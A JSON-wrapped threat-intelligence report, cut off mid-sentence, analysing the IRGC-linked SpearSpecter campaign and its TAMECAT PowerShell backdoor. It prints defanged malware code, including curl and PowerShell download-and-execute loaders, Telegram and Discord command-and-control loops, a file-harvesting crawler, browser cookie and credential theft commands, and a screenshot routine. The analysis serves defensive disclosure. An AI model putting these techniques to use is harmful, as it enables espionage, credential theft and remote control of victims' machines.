{ "id": "6d028990-1e48-4256-875b-86bd494e83ff", "created_at": "2026-04-06T00:18:19.873413Z", "updated_at": "2026-04-10T13:12:32.353359Z", "deleted_at": null, "sha1_hash": "686b64604331d09ecd155ffe6a379958f2d87b32", "title": "SpearSpecter", "llm_title": "", "authors": "", "file_creation_date": "0001-01-01T00:00:00Z", "file_modification_date": "0001-01-01T00:00:00Z", "file_size": 1254019, "plain_text": "SpearSpecter\r\nArchived: 2026-04-05 21:59:19 UTC\r\nSpearSpecter: Unmasking Iran’s IRGC\r\nCyber Operations Targeting\r\nHigh-Profile Individuals\r\nPublished: Nov 2025\r\nBy: Shimi Cohen, Adi Pick, Idan Beit-Yosef, Hila David, and Yaniv Goldman\r\nTags: SpearSpecter, APT42, IRGC, TAMECAT, Social Engineering, Fileless Malware, Discord C2, Telegram C2,\r\nCloud Infrastructure Abuse, Threat Research, Nation-State Threats\r\nExecutive Summary\r\nIsrael National Digital Agency researchers have uncovered an ongoing, sophisticated espionage campaign, which\r\nwe track as SpearSpecter, conducted by Iranian threat actors aligned with the Islamic Revolutionary Guard\r\nCorps Intelligence Organization (IRGC-IO) that operates under multiple aliases, including APT42, Mint\r\nSandstorm, Educated Manticore, and CharmingCypress.\r\nhttps://web.archive.org/web/20251113165018/https://govextra.gov.il/national-digital-agency/cyber/research/spearspecter/\r\nPage 1 of 48\n\nThe group's main objective is espionage against individuals or organizations of interest to the IRGC. Their attacks\r\ndemonstrate the stealth and persistence of nation-state actors. They rapidly adapt their tactics, techniques, and\r\nprocedures (TTPs).\r\nThe campaign has systematically targeted high-value senior defense and government officials using personalized\r\nsocial engineering tactics. These include inviting targets to prestigious conferences or arranging significant\r\nmeetings. In addition, the campaign broadens its scope by also targeting family members, thereby widening the\r\nattack surface and increasing pressure on the primary targets.\r\nSpearSpecter distinguishes itself through relationship building and trust cultivation. Instead of mass phishing,\r\noperators spend days or weeks developing authentic-seeming relationships with targets. They now extend\r\nengagement via direct WhatsApp communication, adding familiarity and legitimacy to social engineering, which\r\nhelps them successfully introduce malicious elements.\r\nWithin the SpearSpecter campaign, the threat actor adapts its approach based on the value of the target and\r\noperational objectives. For credential harvesting, attackers direct victims to crafted spoofed meeting pages that\r\ncapture credentials in real time. For long-term data-driven access, they deploy a sophisticated PowerShell-based\r\nbackdoor known as TAMECAT (as named by Google) , with modular components designed to facilitate data\r\nexfiltration and remote control.\r\nThis article highlights the threat actor's recently observed TTPs. Specifically, it examines new TAMECAT\r\nmodules, a multi-channel Command and Control infrastructure using Telegram and Discord, payload staging via\r\nWebDAV infrastructure, and creative exploitation of native Windows features.\r\nOur investigation identified tools, infrastructure components, and operational patterns within SpearSpecter. These\r\nstrongly align with activity historically attributed to Iranian state-aligned actors within the IRGC's cyber apparatus.\r\nThe strategic focus on senior leadership, combined with these tailored delivery methods and custom tooling,\r\nexemplifies the patient, intelligence-first operations characteristic of state-sponsored APT groups.\r\nTrust Through Sophisticated Social Engineering Engagement\r\nSpearSpecter elevates spear-phishing by devoting weeks to building personalized relationships with high-value\r\ntargets. They gather deep intelligence and use tailored engagement strategies.\r\nThe threat actor conducts extensive reconnaissance via social media, public databases, and professional networks.\r\nThis enables them to impersonate people from the victim's affiliations and craft believable scenarios involving\r\nexclusive conferences or strategic meetings (physical in some cases). They sustain multi-day conversations to build\r\ncredibility. Use of WhatsApp further adds perceived legitimacy.\r\nInitial Access \u0026 Deployments\r\nTo gain long-term access, attackers send the victim a link. They usually claim it is a required document for an\r\nupcoming meeting or conference. When clicked, the victim is redirected to a lure document hosted on OneDrive.\r\nSeveral background redirects silently execute before the document loads.\r\nhttps://web.archive.org/web/20251113165018/https://govextra.gov.il/national-digital-agency/cyber/research/spearspecter/\r\nPage 2 of 48\n\nOne redirect leads to a crafted web page that abuses the Windows search-ms URI protocol handler. This tactic\r\ntriggers a pop-up prompt asking the user to \"Open Windows Explorer\".\r\nFigure 1: Chrome prompt asking the user to confirm Explorer access requested by the web page.\r\nIf the victim confirms the prompt, Explorer connects to the attacker's WebDAV server (a protocol for sharing files\r\nover the internet). In the background, the rundll32.exe process runs the DavSetCookie function in the Windows\r\nlibrary davclnt.dll , which establishes an HTTP connection to the WebDAV server. The following command is\r\nexecuted:\r\nrundll32.exe C:\\WINDOWS\\system32\\davclnt.dll, DavSetCookie\r\ndatadrift[.]somee[.]com@SSL\r\nhxxps[://]datadrift[.]somee[.]com/aoh5/[REDACTED].lnk\r\nThis remote share displays a malicious LNK file (shortcut) to the victim, disguised as a PDF.\r\nhttps://web.archive.org/web/20251113165018/https://govextra.gov.il/national-digital-agency/cyber/research/spearspecter/\r\nPage 3 of 48\n\nFigure 2: Initial access LNK file shared via WebDAV pretending to be a PDF file.\r\nIf the victim clicks the shortcut, it silently runs a command shell that uses curl to fetch and run a batch script from\r\nCloudflare Workers.\r\nThe following shows a cleaned and deobfuscated version of the command that fetches and executes the batch script\r\n( temp.bat ):\r\ncmd /c curl --ssl-no-revoke -o vgh.txt\r\nhxxps[://]line[.]completely[.]workers[.]dev/aoh5 \u0026 rename vgh.txt\r\ntemp.bat \u0026 %tmp%\r\nTemp.bat functions as TAMECAT's primary loader and the core of its modular architecture. The batch file contains\r\nobfuscated PowerShell that fetches further payloads and runs them in memory, minimizing disk artifacts and\r\nreducing detection risk.\r\nThe following is a deobfuscated PowerShell command of Temp.bat that shows TAMECAT's modules fetch and load\r\ncycle:\r\npowershell -w 1 \"$lb='gBjs';$uq=(invoke-restmethod -UserAgent\r\n'Chrome' 'hxxps[://]line[.]completely[.]workers[.]dev[/]aoh52');.(gcm i*ee*)$uq\r\nThis approach enables continuous retrieval of new modules and capabilities from the C2 infrastructure throughout\r\nthe malware's lifecycle.\r\nhttps://web.archive.org/web/20251113165018/https://govextra.gov.il/national-digital-agency/cyber/research/spearspecter/\r\nPage 4 of 48\n\nThis loader creates a persistence entry that points to a file in the %LOCALAPPDATA%\\Microsoft\\Windows\\AutoUpdate\r\ndirectory. The file name is randomly generated at runtime. In the observed sample, the file was\r\nfhgPcZTORoCNEDsm.txt .\r\nThe same persistence mechanism triggers PowerShell to read and execute the stored script in memory:\r\npowershell -w 1 \"$PbwpcDxXtAnaGrsu=(Get-Content -Path\r\nC:\\Users\\victim\\AppData\\Local\\Microsoft\\Windows\\AutoUpdate\\fhgPczTORoCNEDsm.txt);\r\n\u0026(gcm i*x)$PbwpcDxXtAnaGrsu\"\r\nOnce running, the loader cycles through a list of command-and-control (C2) servers. It continues until it finds a valid\r\ncontroller payload. Each payload is a TAMECAT module.\r\nModular Fileless Execution: TAMECAT's In-Memory Loader Chain\r\nThe main activity in this campaign involves TAMECAT malware.\r\nOur research revealed TAMECAT modules that extend the attacker's capabilities by adding multi-channel Command\r\nand Control (C2) infrastructure via Telegram and Discord - an evolution not previously documented in reports on\r\nAPT42 activity.\r\nTo understand TAMECAT's modules' behavior, it is important to note that each module handles a specific task.\r\nTAMECAT uses a modular PowerShell framework to maintain persistence and conduct system reconnaissance. It\r\ncollects browser data and credentials, executes remote commands, and exfiltrates data.\r\nThe following sections provide a full attack flow diagram and a focused deep dive into TAMECAT's operational\r\nactivity and techniques.\r\nhttps://web.archive.org/web/20251113165018/https://govextra.gov.il/national-digital-agency/cyber/research/spearspecter/\r\nPage 5 of 48\n\nFigure 3: TAMECAT's In-Memory Loader Chain.\r\nMulti-Channel Command and Control Infrastructure\r\nIn the SpearSpecter campaign, the attacker deployed three distinct C2 channels:\r\nHTTPS, Discord, and Telegram.\r\nhttps://web.archive.org/web/20251113165018/https://govextra.gov.il/national-digital-agency/cyber/research/spearspecter/\r\nPage 6 of 48\n\nThe use of multiple redundant C2 channels, combined with legitimate service infrastructure, demonstrates the\r\nattacker's intent to maintain long-term, stealthy access while focusing on resilience against detection and disruption.\r\nThe attacker encrypted all data transfers over these channels using the AES-256 algorithm, with a hardcoded\r\nencryption key and a random 16-character IV. The IV was transmitted to the operator through a custom header\r\nnamed Sec-Host.\r\nThe SpearSpecter campaign was the first recorded instance of APT42 using Telegram and Discord as C2.\r\nTelegram C2 Mechanism\r\nTAMECAT listens for commands from the attacker's Telegram bot. Based on the received message, the script fetches\r\nand executes additional PowerShell code from different domains, all hosted under Cloudflare workers\r\n( workers[.]dev ).\r\nThis modular approach allows the attacker to dynamically load and execute additional payloads depending on their\r\nobjective on the compromised host.\r\nSuspicious Command Keyword Associated Domain\r\nInvest eaggcz2fj7yzqdzx97i96[.]darijo-bosanac-dl[.]workers[.]dev\r\nScene f3nq6re4nmjwbr8ks5g2qu[.]darijo-bosanac-dl[.]workers[.]dev\r\nLook kxp5sxfwiu7b6quo346hhyc[.]darijo-bosanac-dl[.]workers[.]dev\r\nCnvrt 2tv995jjg6cx679bspy[.]darijo-bosanac-dl[.]workers[.]dev\r\nTrsdls mvwmh7pxxd33375gj9wwjhcmbk[.]darijo-bosanac-dl[.]workers[.]dev\r\nAnchor 27ehoddkc8t7jer4aic55uh3[.]darijo-bosanac-dl[.]workers[.]dev\r\nTrnspt w5fb5r3txrsvga7zot9uz54k[.]darijo-bosanac-dl[.]workers[.]dev\r\n#Journey Used to set decryption key\r\nIncoming Telegram messages are evaluated by the script against a set of supported commands. If a message is not\r\namong those commands, it is not the literal \"exit\" and does not start with the prefix \"#journey\", the script treats the\r\nmessage as a PowerShell payload and executes it.\r\nWhen executed, the PowerShell script runs and writes the output to a file located at $env:TEMP\\UZ4sWF2aV.txt . The\r\noutput file is then sent back to the Telegram bot, allowing the attacker to receive the command result.\r\nThis approach enables the attacker to maintain dynamic and resilient remote code execution capabilities on\r\ncompromised hosts. This ensures persistence and operational continuity even when protective measures, such as\r\nCloudflare, block the actor's infrastructure.\r\nPowerShell\r\n1\r\nhttps://web.archive.org/web/20251113165018/https://govextra.gov.il/national-digital-agency/cyber/research/spearspecter/\r\nPage 7 of 48\n\nwhile ($true) {\r\n2\r\n$uri = 'hxxps[://]api.telegram[.]org/$Sguqs9XH8vzLVtp/getUpdates?offset=$($lastIncomingID+1)';\r\n3\r\n$response = \u0026(gcm i*e-r*tme*?) -UserAgent $asjkl -Uri $uri;\r\n4\r\nforeach ($RSS in $response.result) {\r\n5\r\nif ($RSS.message) {\r\n6\r\n$telegraf = $RSS.message.text;\r\n7\r\nif ($telegraf -ne $BookmarkCM) {\r\n8\r\nif ($telegraf -like \"\\#journey*\") {\r\n9\r\n$rk = $telegraf.Substring(8).Trim();\r\n10\r\nif ($rk.Length -eq 32) {\r\n11\r\n          ....\r\n12\r\n13\r\nif ($telegraf -eq \"\\/invest\") {\r\n14\r\n          ....\r\n15\r\nhttps://web.archive.org/web/20251113165018/https://govextra.gov.il/national-digital-agency/cyber/research/spearspecter/\r\nPage 8 of 48\n\n16\r\nif ($telegraf -eq \"\\/anchor\") {\r\n17\r\nif ($y6m3bhjadnfv7wg5s.Length -eq 32) {\r\n18\r\ntry {\r\n19\r\n$compose = (wget -UserAgent $asjkl \"hxxps[://]27ehoddkc8t7jer4aic55uh3.darijo-bosanac-dl[.]workers[.]dev\");\r\n20\r\n$anchor = iajbejkf -key $y6m3bhjadnfv7wg5s -data $compose.Content;\r\n21\r\n              \u0026 (gcm i*? -e*n) $anchor;\r\n22\r\n$BookmarkCM = $telegraf;\r\n23\r\n          }\r\n24\r\ncatch {\r\n25\r\n          ...\r\n26\r\n27\r\nif ($telegraf -ne \"\\/invest\" -and $telegraf -ne \"\\/look\" -and $telegraf -ne \"\\/anchor\" -and $telegraf -ne\r\n\"\\/trsdl s\\\" -and $telegraf -ne \"\\/cnvrt\" -and $telegraf -ne \"\\/scene\" -and $telegraf -ne \"\\/trnspt\" -and\r\n$telegraf -notlike \"\\#journey*\") {\r\n28\r\nif ($telegraf -ne \"\\/exit\") {\r\nhttps://web.archive.org/web/20251113165018/https://govextra.gov.il/national-digital-agency/cyber/research/spearspecter/\r\nPage 9 of 48\n\n29\r\n$result = \u0026(gcm i*?-e*n) $telegraf | Out-String;\r\n30\r\n$result1 | Out-File -FilePath \"$env:TEMP\\UZ4sWF2aV.txt\" -Encoding UTF8;\r\n31\r\nStart-Sleep -Seconds (Get-Random -Minimum 4 -Maximum 9);\r\n32\r\n            ....\r\n33\r\nremove-item \"$env:TEMP\\UZ4sWF2aV.txt\";\r\n34\r\n          }\r\nFigure 4: Getting command message and running the corresponding PowerShell.\r\nDiscord C2 Mechanism\r\nIn the Discord C2 channel, the attacker used a traditional Discord webhook URL to forward his messages and a\r\nhardcoded channel ID with a bot token to fetch commands.\r\nDiscord webhook is a special URL that allows external applications to send messages to a specific Discord channel.\r\nIt's an easy way to integrate Discord with other applications, delivering notifications directly to a server channel\r\nwithout complex bot programming.\r\nThe Discord C2 module has two main functions: one sends basic info about the infected system to a Discord\r\nwebhook URL, while the second is a retrieval function that receives commands from a hardcoded Discord channel.\r\nThe retrieval function retrieves commands using a bot token and channel ID, then searches for messages sent by a\r\nspecific user (in this case, \"mick\"). When a message is found, it extracts the attached file and fetches the PowerShell\r\nscript from it (which is obfuscated \u0026 encrypted).\r\nAnalysis of accounts recovered from the actor's Discord server suggests the command lookup logic relies on\r\nmessages from a specific user, allowing the actor to deliver unique commands to individual infected hosts while\r\nusing the same channel to coordinate multiple attacks, effectively creating a collaborative workspace on a single\r\ninfrastructure.\r\nAdditionally, after fetching the first messages, the module saves the message ID in the\r\nHKCU:\\SOFTWARE\\firstOrder\\id registry key to ensure only newer messages are processed next time and avoid\r\nrunning the same commands repeatedly.\r\nhttps://web.archive.org/web/20251113165018/https://govextra.gov.il/national-digital-agency/cyber/research/spearspecter/\r\nPage 10 of 48\n\nPowerShell\r\n1\r\nfunction func_get_commands_from_discord() {\r\n2\r\n3\r\nif ($global:mId -eq 0) {\r\n4\r\n$wsxbebgushqoryzj = \"hxxps[://]discord[.]com/api/channels/{REDACTED}\" + \"/messages\";\r\n5\r\n    }\r\n6\r\nelse {\r\n7\r\n$wsxbebgushqoryzj = \"hxxps[://]discord[.]com/api/channels/{REDACTED}\" + \"/messages?\r\nafter=$global:mId\";\r\n8\r\n    }\r\n9\r\n10\r\n$gufgtgudxbokisiqun = \u0026((\u0026gcm) (New-Object )) -Co (MSXML2.serverXMLHTTP)\r\n11\r\n$gufgtgudxbokisiqun.open(\"GET\", $wsxbebgushqoryzj, $false)\r\n12\r\n$gufgtgudxbokisiqun.setRequestHeader(\"Authorization\", \"Bot MTxqNDg4{REDACTED}2ya1GmP-\r\n_bG3-h-oJuOq7gpwoJ_ax8\");\r\n13\r\n$gufgtgudxbokisiqun.setRequestHeader(\"User-Agent\", \"DiscordBot\");\r\n14\r\nhttps://web.archive.org/web/20251113165018/https://govextra.gov.il/national-digital-agency/cyber/research/spearspecter/\r\nPage 11 of 48\n\ntry {\r\n15\r\n$gufgtgudxbokisiqun.send()\r\n16\r\nif ($gufgtgudxbokisiqun.status -ne 200) {\r\n17\r\nthrow \"02122008\"\r\n18\r\n        }\r\n19\r\n$sisxgnnswidrxnuma = $gufgtgudxbokisiqun.responseText | ConvertFrom-Json\r\n20\r\n$seebxgulhsoyyp = $sisxgnnswidrxnuma | Where-Object {($_.author.username -eq mick\\) -and\r\n($_.attachments.url -ne $null) -and ($_.content.Length -eq 16)}\r\n21\r\n    }\r\n22\r\ncatch {\r\n23\r\n    }\r\n24\r\n25\r\nif ($sisxgnnswidrxnuma.Length -gt 0) {\r\n26\r\n$global:mId = $sisxgnnswidrxnuma[0].id\r\n27\r\n$efxgooxzkq = New-ItemProperty -Path 'HKCU:\\SOFTWARE\\firstOrder\\' -Name id -Value\r\n$global:mId -Force\r\nhttps://web.archive.org/web/20251113165018/https://govextra.gov.il/national-digital-agency/cyber/research/spearspecter/\r\nPage 12 of 48\n\n28\r\n    }\r\n29\r\nreturn $seebxgulhsoyyp\r\n30\r\n}\r\nFigure 5: Queries Discord for commands and stores the last message ID in the registry.\r\nPowerShell\r\n1\r\nfunction func_discord_C2_req() {\r\n2\r\n$wsxbebgushqoryzj =\r\n\"hxxps[://]discord[.]com/api/webhooks/141{REDACTED}3215/dsC1ORNt{REDACTED}TvZ4ykpc52NAferf;\"\r\n3\r\n$OS_version = (Get-WmiObject -class Win32_OperatingSystem).Caption + \" Enc\"\r\n4\r\n$rctycno = \"{\\\"fD!LJplkwnuMBHx\\\": [{\\\"num\\\": '\" + $global:numone + + $OS_version + +\r\n$env:COMPUTERNAME + + $sseyuqiyosawuh +\r\n5\r\n$neplpvfyvydldjjc = func_random_16_chars;\r\n6\r\n$igsftpzippdunnlnagd = func_AES_encryption -krfuzkxgppuz $rctycno -jgxylumafjcztgnspkj\r\n$eirimyofqrszfghnc -xemjwduuof\r\n7\r\n$neplpvfyvydldjjc;\r\n8\r\n$etedsuomdywrz = @{ \"data\" = @{ \"json\" = $igsftpzippdunnlnagd }; \"Sec-Host\" = $neplpvfyvydldjjc\r\n} | ConvertTo-Json\r\nhttps://web.archive.org/web/20251113165018/https://govextra.gov.il/national-digital-agency/cyber/research/spearspecter/\r\nPage 13 of 48\n\n9\r\n$bvkakf = @{ \"content\" = $etedsuomdywrz }\r\n10\r\n$gufgtgudxbokisiqun = \u0026((\u0026gcm) (New-Object )) -Co (MSXML2.serverXMLHTTP)\r\n11\r\n$gufgtgudxbokisiqun.open(\"POST\", $wsxbebgushqoryzj, $false)\r\n12\r\n$gufgtgudxbokisiqun.setRequestHeader(\"Content-type\", \"application/json\")\r\n13\r\n$gufgtgudxbokisiqun.setRequestHeader(\"User-Agent\", \"Mozilla/5.0 (Windows NT 10.0; Win64; x64)\r\nAppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Safari/537.36 Edg/135.0.0.0\")\r\n14\r\n15\r\ntry {\r\n16\r\n$gufgtgudxbokisiqun.send(($bvkakf | ConvertTo-Json))\r\n17\r\nif ($gufgtgudxbokisiqun.status -ne 204) {\r\n18\r\nthrow \"hbaefhsekjf\"\r\n19\r\n        }\r\n20\r\nreturn \"OK\"\r\n21\r\n    }\r\n22\r\nhttps://web.archive.org/web/20251113165018/https://govextra.gov.il/national-digital-agency/cyber/research/spearspecter/\r\nPage 14 of 48\n\n}\r\nFigure 6: The function that sends basic system info to the Discord webhook.\r\nThe IV (Initialization Vector) used to encrypt the data sent is included in the JSON field called Sec-Host. This\r\nfollows the same approach used to deliver the IV in the HTTP C2 channel, except that it is embedded in the message\r\nrather than an HTTP header.\r\nDiscovery \u0026 Data Harvesting\r\nTAMECAT's approach to reconnaissance and data theft is deliberate, stealthy, and carefully orchestrated to minimize\r\ndetection while maximizing data-collection effectiveness. Unlike indiscriminate dumping of all data, the backdoor\r\nselectively gathers high-value artifacts such as documents, browser data, system general information, and\r\nscreenshots. Collected artifacts are queued and exfiltrated via encrypted channels.\r\nInitial Reconnaissance Modules\r\nFour compact modules provide TAMECAT's initial reconnaissance capability. The Information module fingerprints\r\nthe host for targeting by collecting the OS and its version, hostname and domain, user and privilege level, network\r\nconfiguration, uptime, and patch status.\r\nThe Application Module inventories installed software and associated metadata, including versions, install paths,\r\nMSI and registry entries, and common persistence locations.\r\nThe Processes Module captures runtime process state, including process trees, command lines, and loaded modules,\r\nenabling operators to identify injection targets, confirm staged components, detect security solutions, and harvest\r\ncredentials or other in-memory artifacts.\r\nUsing the Shell module, the attacker also enumerated installed antivirus and endpoint protection products, collected\r\ntargeted data into a list file for later exfiltration, and staged the target Outlook OST file before exfiltration. The\r\nmodule executes arbitrary shell commands via a cmd.exe /c wrapper.\r\nFiles and Documents\r\nThe TAMECAT FileCrawler module builds a quiet staging queue of target files before exfiltration. The tool\r\nenumerates filesystem roots and aggregates selected file paths into ALL*.txt files, such as ALL.txt and ALL-2.txt , under %LOCALAPPDATA%\\Caches .\r\nThese files serve as the queue of approved items awaiting exfiltration. Each entry is a full file path encoded in\r\nBase64 and separated by a triple-semicolon delimiter ( ;;; ).\r\nTAMECAT implements targeted file collection focusing on high-value document types:\r\n*.txt, *.pdf, *.xlsx, *.xls, *.csv, *.kdbx, *.docx, *.doc, *.gdoc, *.ppt, *.pptx,\r\n*.mp4, *.mov, *.wmv, *.flv, *.avi, *.webm, *.mkv, *.m4a, *.mp3, *.wav, *.wma,\r\n*.aac, *.ogg, *.opus, *.jpg, *.jpeg, *.gif, *.png, *.odt, *.rtf, *.zip, *.rar,\r\n*.7z.\r\nhttps://web.archive.org/web/20251113165018/https://govextra.gov.il/national-digital-agency/cyber/research/spearspecter/\r\nPage 15 of 48\n\nTo maximize efficiency and reduce noise, the malware excludes noisy or low-value locations:\r\n\\\"*\\\\iCloudPhotos*\\, \\\"*\\\\OneDrive*\\, \\\"*\\\\All Users*\\, \\\"*\\\\AppData*\\, \\\"*cache*\\,\r\n\\\"*tdata*\\, \\\"*program*\\, \\\"*window*\\, \\\"*windows*\\, \\\"*mingw*\\, \\\"*msocache*\\,\r\n\\\"*tdata*\\, \\\"*visual studio*\\, \\\"*visualstudio*\\, \\\"*android studio*\\,\r\n\\\"*androidstudio*\\, \\\"*android*\\, \\\"*$*\\, \\\"*anaconda*\\, \\\"*vscode*\\, \\\"*site-packages*\\, \\\"*pycharm*\\, \\\"*\\\\.*\\, \\\"*.nuget*\\, \\\"*.jd*\\, \\\"*packages\\.\r\nThe module also creates a FileCrawler.txt that lists the file extension, name, full path, size, creation time, and last\r\naccess time of the approved files.\r\nThe deobfuscated code below displays the module's file and document collection process:\r\nPowerShell\r\n1\r\n# Enumerate drives and crawl files to build ALL.txt and FileCrawler.txt\r\n2\r\n$include = @('*.txt','*.pdf','*.xlsx', ... \u003cfull list above\u003e ...)\r\n3\r\n$exclude = @('iCloudPhotos','OneDrive','All Users', ... \u003cfull list above\u003e ...)\r\n4\r\n5\r\n$queueFile   = Join-Path $env:LOCALAPPDATA 'Caches\\ALL.txt'\r\n6\r\n$metaFile    = Join-Path $env:LOCALAPPDATA 'Caches\\FileCrawler.txt'\r\n7\r\n$downloadBuffer = \"\"\r\n8\r\n$metaBuffer   = \"\"\r\n9\r\n10\r\n# Recursively scan drives\r\nhttps://web.archive.org/web/20251113165018/https://govextra.gov.il/national-digital-agency/cyber/research/spearspecter/\r\nPage 16 of 48\n\n11\r\nGet-PSDrive -PSProvider FileSystem | ForEach-Object {\r\n12\r\nGet-ChildItem -Path $_.Root -Recurse -File -ErrorAction SilentlyContinue | ForEach-Object {\r\n13\r\n$path = $_.FullName\r\n14\r\n$name = $_.Name\r\n15\r\nif ($exclude | Where-Object { $path -match $_ }) { return }\r\n16\r\nif ($include | Where-Object { $name -like $_ }) {\r\n17\r\n$ext       = $_.Extension\r\n18\r\n$size      = $_.Length\r\n19\r\n$creation  = $_.CreationTimeUtc\r\n20\r\n$lastAccess= $_.LastAccessTimeUtc\r\n21\r\n22\r\n# Append metadata to FileCrawler.txt\r\n23\r\n$metaBuffer += \"$ext|$name|$path|$size|$creation|$lastAccess`r`n\"\r\n24\r\n25\r\nhttps://web.archive.org/web/20251113165018/https://govextra.gov.il/national-digital-agency/cyber/research/spearspecter/\r\nPage 17 of 48\n\n# Encode path as Base64 and add to ALL.txt queue\r\n26\r\n$pathB64 = [Convert]::ToBase64String([Text.Encoding]::UTF8.GetBytes($path))\r\n27\r\n$downloadBuffer += $pathB64 + ';;;'\r\n28\r\n        }\r\n29\r\n    }\r\n30\r\n}\r\n31\r\n32\r\n# Write the collected data to disk\r\n33\r\n$metaBuffer      | Out-File -FilePath $metaFile -Encoding utf8\r\n34\r\n$downloadBuffer  | Out-File -FilePath $queueFile -Encoding utf8\r\nFigure 7: Files and document collection by TAMECAT\r\nBrowser Data Extraction \u0026 Collection\r\nMicrosoft Edge Data Extraction via Remote Debugging\r\nTAMECAT bypasses the complexity and limitations of directly parsing locked browser databases by exploiting\r\nMicrosoft Edge's native remote debugging capabilities. TAMECAT Browser module handles the activity, it bypasses\r\nthe complexity and limitations of directly parsing locked browser databases by exploiting Microsoft Edge's native\r\nremote debugging capabilities. The backdoor launches Microsoft Edge in a fully hidden mode, disables its sandbox\r\nto allow unrestricted access, and opens a remote debugging port locally on 9222 with the following command:\r\n\"msedge.exe\" --no-sandbox --remote-debugging-port=9222\r\n--remote-allow-origins=ws://localhost:9222 --window-position=-32000,-32000\r\nhttps://web.archive.org/web/20251113165018/https://govextra.gov.il/national-digital-agency/cyber/research/spearspecter/\r\nPage 18 of 48\n\nFollowing this, TAMECAT queries the local debugging endpoint at:\r\nhttp://localhost:9222/json\r\nThis endpoint returns a list of active DevTools targets representing all open browser contexts, such as tabs and\r\nservice workers.\r\nTAMECAT then establishes WebSocket connections to each target's webSocketDebuggerUrl\r\n( ws://127.0.0.1:9222/devtools/page/\u003ctarget_id\u003e ) and sends DevTools Protocol commands such as\r\n{\"id\":1,\"method\":\"Storage.getCookies\"} ).\r\nThese commands instruct the browser to transmit all stored cookies for the browsing context, returning them fully\r\ndecrypted via the browser's internal APIs. This innovative approach eliminates the need to manually copy and\r\ndecrypt the browser's SQLite database files.\r\nFinally, the acquired cookie data is serialized into JSON format and stored locally under paths such as:\r\n%LOCALAPPDATA%\\Caches\\BS\\Cookie__Last\u003cid\u003e.json\r\nwhere \u003cid\u003e corresponds to the DevTools target identifier, facilitating organized storage and later exfiltration of stolen\r\ncredentials.\r\nChrome Suspension for Data Extraction\r\nBecause Chrome uses the SQLite profile databases, such as Login Data, Network\\Cookies, and Web Data, direct\r\naccess is often blocked or unreliable during active browsing sessions.\r\nTo bypass this, TAMECAT uses the legitimate Sysinternals tool PsSuspend to suspend the Chrome process\r\ntemporarily, enabling safe access to the locked databases without corruption:\r\nC:\\Users\\victim\\AppData\\Local\\Caches\\pssuspend.exe -accepteula -nobanner \u003cchrome_pid\u003e\r\nThis Suspension releases file locks, allowing the malware to safely copy or read the profile databases.\r\nNext, TAMECAT launches Microsoft Edge in an off-screen, sandbox-disabled mode that acts as a trusted\r\nintermediary to open Chrome's profile data:\r\n\"C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\msedge.exe\"\r\n --profile-directory=\"Default\"\r\n --window-size=\"0,0\"\r\n --window-position=\"-32000,-32000\"\r\n --no-sandbox\r\n \"C:\\Users\\victim\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Login\r\nData\"\r\n \"C:\\Users\\victim\\AppData\\Local\\Google\\Chrome\\User\r\nhttps://web.archive.org/web/20251113165018/https://govextra.gov.il/national-digital-agency/cyber/research/spearspecter/\r\nPage 19 of 48\n\nData\\Default\\Network\\Cookies\"\r\n \"C:\\Users\\victim\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Web Data\"\r\nThis process results in fully accessible and readable data files, which TAMECAT then parses using libraries such as\r\nSystem.Data.SQLite.dll to extract sensitive credentials and browsing history.\r\nFinally, the collected data is compressed into archives such as Data_Chrome__Default.rar before being staged for\r\ncovert exfiltration.\r\nStealthy Screen Capture\r\nTAMECAT's Screen module includes a screen-capture module that captures 50 screenshots at 15-second intervals.\r\nEach image is temporarily saved locally at:\r\n%LOCALAPPDATA%\\Caches\\SS\\NO\\\r\nImmediately after capture, each screenshot is uploaded and then deleted from local storage to reduce forensic traces.\r\nBelow is the deobfuscated, cleaned code extracted from the original module:\r\nPowerShell\r\n1\r\n# One-shot full desktop screenshot to PNG\r\n2\r\nfunction Save-Screenshot() {\r\n3\r\n$screen = [System.Windows.Forms.SystemInformation]::VirtualScreen\r\n4\r\n$bmp    = New-Object System.Drawing.Bitmap($screen.Width, $screen.Height)\r\n5\r\n$gfx    = [System.Drawing.Graphics]::FromImage($bmp)\r\n6\r\n$gfx.CopyFromScreen($screen.Left, $screen.Top, 0, 0, $bmp.Size)\r\n7\r\n$bmp.Save($Path, [System.Drawing.Imaging.ImageFormat]::Png)\r\nhttps://web.archive.org/web/20251113165018/https://govextra.gov.il/national-digital-agency/cyber/research/spearspecter/\r\nPage 20 of 48\n\n8\r\n$gfx.Dispose(); $bmp.Dispose()\r\n9\r\n}\r\n10\r\n11\r\n...\r\n12\r\n# Take 50 screenshots, 15s apart\r\n13\r\n1..50 | ForEach-Object {\r\n14\r\n$name = (Get-Date -Format 'yyyy-dd-MM_HH-mm-ss') + '.png'\r\n15\r\n$png   = Join-Path $cacheDir $name\r\n16\r\nSave-Screenshot $png\r\n17\r\n# exfiltrate $png\r\n18\r\nRemove-Item -Force $png -ErrorAction SilentlyContinue\r\n19\r\nStart-Sleep -Seconds 15\r\n20\r\n}\r\nFigure 8: screenshots collection by TAMECAT\r\nOutlook OST Collection\r\nhttps://web.archive.org/web/20251113165018/https://govextra.gov.il/national-digital-agency/cyber/research/spearspecter/\r\nPage 21 of 48\n\nThe TAMECAT Shell module was used to perform targeted collection of Outlook mailboxes. The module copies the\r\nlocal .ost cache files from Outlook profile directories, splits the data into chunks, and exfiltrates the data over\r\nencrypted channels, enabling the extraction of high-value mailbox content from the victim. This shows the attacker's\r\ninterest in email-related information.\r\nPowerShell\r\n1\r\n# Copy user mailbox cache from Outlook directory\r\n2\r\ncopy-item C:/Users/{USER}/AppData/Local/Microsoft/Outlook/@example.com.ost `\r\n$env:APPDATA/victim@example.com.ost\r\nFigure 9: OST outlook file copies by TAMECAT into the exfiltration folder\r\nStealing in Silence: TAMECAT's Data Exfiltration Game\r\nAfter collecting targeted data, TAMECAT stages and packages the artifacts for transmission using channels often\r\nshared with its command-and-control (C2) infrastructure. The data is first encrypted and transformed into JSON\r\nbefore being sent over a secure connection to evade interception. The Download module is responsible for the\r\ndifferent exfiltration methods.\r\nPackaging \u0026 staging\r\nTargeted exfiltration begins with the queue file ALL.txt , where the tool consumes a single entry per iteration,\r\ndecodes that Base64-encoded entry to recover the full file path, and adds the path to the current run set. Browser data\r\nand screenshots generated by other modules are included in the exfiltration run set.\r\nThe files are compressed into archives using a renamed WinRAR binary called R.exe , and those archives are\r\nplaced in the cache folder for 